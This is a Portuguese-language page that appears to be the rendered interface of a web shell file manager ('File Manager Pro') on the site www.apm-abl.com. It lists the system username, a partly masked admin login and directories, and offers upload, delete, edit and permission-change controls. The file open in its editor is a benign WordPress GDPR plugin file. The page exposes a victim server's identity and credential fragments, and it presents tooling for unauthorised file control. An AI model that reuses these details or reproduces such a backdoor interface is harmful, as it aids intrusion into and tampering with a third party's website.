🗂️ File Manager Pro
🖥️ Tipo de Hospedagem:
Vps
📁 Diretório Raiz:
/home
🌐 Servidor:
www.apm-abl.com
👤 Usuário:
apmablcosr
🔐 Sessão:
🔑 Credenciais:
adm_89b9909c / e320****
📍 Localização Atual:
home
Caminho completo: /home
📤 Enviar Arquivo
📁 Nova Pasta
⬆️ Voltar
🏠 Raiz
🗑️ DELETAR
📦 ZIPAR/DEZIPAR
Status
Nome
Tamanho
Modificado
Permissões
Ações
📁 a
-
03/02/2026 22:15
0755
✏️
📁 apmablcosr
-
26/01/2026 16:35
0705
✏️
🗑️
Editando: class-gdpr-modules-view.php
<?php /** * GDPR_Modules_View File Doc Comment * * @category GDPR_Modules_View * @package gdpr-cookie-compliance * @author Moove Agency */ if ( ! defined( 'ABSPATH' ) ) { exit; } // Exit if accessed directly /** * GDPR_Modules_View Class Doc Comment * * @category Class * @package GDPR_Modules_View * @author Moove Agency */ class GDPR_Modules_View { /** * Load and update view * * Parameters: * * @param string $view // the view to load, dot used as directory separator, no file extension given. * @param mixed $content // The data to display in the view (could be anything, even an object). */ public static function load( $view, $content ) { $view_file_origin = dirname( __FILE__ ) . DIRECTORY_SEPARATOR . 'gdpr-modules'; $view_name = str_replace( '.', DIRECTORY_SEPARATOR, $view ) . '.php'; $locate_template = locate_template( 'gdpr-modules' . DIRECTORY_SEPARATOR . $view_name ); $view_file_origin = $locate_template ? $locate_template : $view_file_origin . DIRECTORY_SEPARATOR . $view_name; if ( file_exists( $view_file_origin ) ) : ob_start(); include $view_file_origin; return ob_get_clean(); endif; } }
💾 Salvar
❌ Cancelar
Enviar Arquivo
Selecionar arquivo:
Enviar
Cancelar
Criar Nova Pasta
Nome da pasta:
Criar
Cancelar
Alterar Permissões
Nova permissão:
0644 (rw-r--r--)
0755 (rwxr-xr-x)
0777 (rwxrwxrwx)
0600 (rw-------)
0700 (rwx------)
0444 (r--r--r--)
💾 Salvar
Cancelar